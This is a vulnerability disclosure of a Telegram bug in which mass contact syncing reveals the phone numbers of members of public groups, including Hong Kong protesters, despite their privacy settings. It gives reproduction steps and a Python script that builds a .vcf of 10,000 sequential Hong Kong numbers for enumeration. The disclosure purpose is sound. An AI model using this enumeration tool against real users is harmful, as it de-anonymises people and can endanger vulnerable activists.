This document describes a security vulnerability in Telegram that discloses the phone number of any member of a public Telegram group, regardless of that user's privacy settings.

The bug was first reported on a Hong Kong discussion forum that is popular among Hong Kong protestors: https://lih.kg/1497612

We are a team of software engineers in Hong Kong, and we have independently verified the bug.

The bug has already been made public, and it has high impact and low attack complexity. We suspect that government-sponsored attackers have exploited this bug to target Hong Kong protesters, in some cases posing an immediate danger to the protesters' lives. We are writing up the bug here and requesting that Telegram respond to this serious issue as soon as possible.


Here are the steps to reproduce the bug:

  1. Alice, a Telegram user, is a member of a public group named CommonsGroup.
  2. Alice does not want anyone to see her phone number on Telegram, so she hides it in Telegram's privacy settings (Privacy > Phone Number > Nobody).
  3. Mallory, the attacker, wants to uncover the real identities of the members of CommonsGroup.
  4. Mallory adds a large number of sequential phone numbers to the address book on her phone, on the assumption that Alice's number falls somewhere in that range (we have tested with 10,000 phone numbers).
  5. Mallory syncs her contacts with Telegram.
  6. Mallory joins CommonsGroup (which is public).

Expected Result

Alice's phone number should never be shown in the Telegram group info, because she has set her phone number privacy to Nobody.

Actual Result

Mallory can see Alice's phone number in the group info. The privacy setting only governs what non-contacts see; once a contact sync matches Alice's number, Telegram treats Alice as one of Mallory's contacts and shows the number to her. In theory, if Mallory adds enough phone numbers, she can uncover the phone number of every member of any public group. This is a real threat for us because the phone number space in Hong Kong is small.
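
To make step 4 and the number-space argument concrete, here is an added example (not code from the original report or from Telegram) that writes a .vcf file of consecutive numbers for import into a phone's address book, which is the input a contact sync then matches against. The country code, 8-digit length and the leading digits treated as mobile ranges are assumptions about Hong Kong numbering, not facts stated in the report, and the starting number is constructed for the example.

```python
"""Sequential-number address-book generator.

Added illustration; not code from the original report or from Telegram.
Numbering-plan values below are assumptions, not facts from the report.
"""
from __future__ import annotations

COUNTRY_CODE = "+852"             # assumption: Hong Kong
LOCAL_DIGITS = 8                  # assumption: HK numbers have 8 local digits
MOBILE_LEADING = ("5", "6", "9")  # assumption: leading digits used by mobiles


def mobile_number_space() -> int:
    """Count of 8-digit local numbers that begin with one of MOBILE_LEADING.

    This is the 'limited space' the report refers to: an attacker who can
    import this many contacts has covered every candidate number.
    """
    return len(MOBILE_LEADING) * 10 ** (LOCAL_DIGITS - 1)


def sequential_numbers(start: str, count: int) -> list[str]:
    """Return up to `count` consecutive E.164 numbers beginning at `start`.

    `start` is the 8-digit local number.  The range stops at the last
    8-digit value instead of wrapping around.
    """
    if len(start) != LOCAL_DIGITS or not start.isdigit():
        raise ValueError(f"start must be {LOCAL_DIGITS} digits, got {start!r}")
    first = int(start)
    last = min(first + count, 10 ** LOCAL_DIGITS)
    return [f"{COUNTRY_CODE}{n:0{LOCAL_DIGITS}d}" for n in range(first, last)]


def vcard_entry(number: str, index: int) -> str:
    """One vCard 3.0 record.  The display name carries the batch index so a
    match can be traced back to its number even when a client shows only
    the contact name."""
    return (
        "BEGIN:VCARD\r\n"
        "VERSION:3.0\r\n"
        f"N:{index:05d};scan;;;\r\n"
        f"FN:scan {index:05d}\r\n"
        f"TEL;TYPE=CELL:{number}\r\n"
        "END:VCARD\r\n"
    )


def build_vcf(numbers: list[str]) -> str:
    """Concatenate records into a single importable .vcf document."""
    return "".join(vcard_entry(n, i) for i, n in enumerate(numbers))


def coverage(count: int) -> float:
    """Fraction of the assumed mobile space covered by a batch of `count`."""
    return count / mobile_number_space()


if __name__ == "__main__":
    # Constructed starting number; 10,000 matches the batch size in the report.
    batch = sequential_numbers("91230000", 10_000)
    with open("scan.vcf", "w", encoding="utf-8") as fh:
        fh.write(build_vcf(batch))
    print(f"wrote {len(batch)} contacts, covering {coverage(len(batch)):.4%} "
          f"of the assumed {mobile_number_space():,}-number mobile space")
```

Each batch file is imported into the phone's Contacts app and then synced to Telegram as in step 5; the coverage figure shows why a single batch of 10,000 is only a starting point and why a small national number space makes exhaustive enumeration practical.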

Platforms

We have independently verified the bug with these settings:

Impact of the Bug

Telegram plays a very important role in the current Hong Kong protests. We have been using Telegram to coordinate many demonstrations and direct actions in a decentralized fashion, and we can only do so because Telegram provides a sufficient level of anonymity to protesters.

The bug leaks users' phone numbers, regardless of their privacy settings, to any other member of a group they have in common who has imported their number into an address book and synced it. It causes severe harm to the privacy of all Telegram users, including people who need to communicate freely in order to protect their freedom.

Contacts

Twitter: @edwincheese

Adding a large number of phone numbers to the address book and syncing them to Telegram

The phone numbers of unknown people in public groups are visible in the group info, even though Phone Number Privacy was set to Nobody